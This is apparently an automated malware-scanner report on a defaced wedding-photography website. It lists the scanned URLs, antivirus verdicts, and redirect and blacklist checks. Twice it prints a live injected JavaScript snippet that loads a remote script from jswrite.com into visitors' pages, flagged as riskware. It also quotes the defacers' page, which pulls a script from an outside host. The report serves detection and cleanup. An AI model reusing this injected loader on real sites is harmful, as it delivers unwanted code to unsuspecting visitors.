New scan:

Malware Scanner report for weddingphotoperth.com

Malicious/Suspicious/Total urls checked
2/0/4
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

Hacked By CodersLeeT Team Contact To www.facebook.com/codersleet.gov  (4 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.weddingphotoperth.com/
200 OK
Content-Length: 7919
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)

if(top == self){ var zhead = document.getElementsByTagName('head')[0]; if(!zhead){zhead = document.createElement('head');} var qscript = document.createElement('script'); qscript.setAttribute('id','wsh2_js'); qscript.setAttribute('src','http://jswrite.com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); }

Antivirus reports:

NANO-Antivirus
Riskware.Script.BetterSurf.ctbzhb

Deface/Content modification. The following signature was found: Hacked By CodersLeeT Team Contact To www.facebook.com/codersleet.gov

...[1492 bytes skipped]...
Gov.png" rel="SHORTCUT ICON"><link rel="shortcut icon" href="http://teste-codersleet.cum.ir/Codersleet.Gov.png" type="image/x-icon"><script src="http://teste-codersleet.cum.ir/AZe-titel.js"type="text/javascript"></script> <!-- Meta --><meta name="keywords" content="CodersLeeT , Codersleet Team , Hackers , Exploit , Anonymous"><meta name="description" content="Hacked By CodersLeeT Team Contact To www.facebook.com/codersleet.gov"><meta name="AUTHOR" content="CodersLeeT , Hacked By Codersleet , Codersleet Was Her"><meta name="Copyright" content="CodersLeeT Copyright 2014 - 2015"><meta name="Designer" content="MC.KIio"><meta name="Publisher" content="Hacked By CodersLeeT Team www.facebook.com/codersleet.gov"><meta name="ROBOTS" content="INDEX, FOLLOW,ALL"> <embed src="http://www.youtube.com/v/3G-t72JjRf0&feature=youtu.be&amp;featur
...[6370 bytes skipped]...


http://teste-codersleet.cum.ir/AZe-titel.js
200 OK
Content-Length: 1812
Content-Type: application/javascript
clean
https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js
200 OK
Content-Length: 91668
Content-Type: text/javascript
clean
http://www.weddingphotoperth.com/test404page.js
200 OK
Content-Length: 7919
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

if(top == self){ var zhead = document.getElementsByTagName('head')[0]; if(!zhead){zhead = document.createElement('head');} var qscript = document.createElement('script'); qscript.setAttribute('id','wsh2_js'); qscript.setAttribute('src','http://jswrite.com/script1.js'); qscript.setAttribute('type','text/javascript');qscript.async = true; if(zhead && !document.getElementById('wsh2_js')) zhead.appendChild(qscript); }

Antivirus reports:

NANO-Antivirus
Riskware.Script.BetterSurf.ctbzhb


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: weddingphotoperth.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: weddingphotoperth.com
Referer: http://www.google.com/search?q=weddingphotoperth.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=weddingphotoperth.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://weddingphotoperth.com/

Result: weddingphotoperth.com is not infected or malware details are not published yet.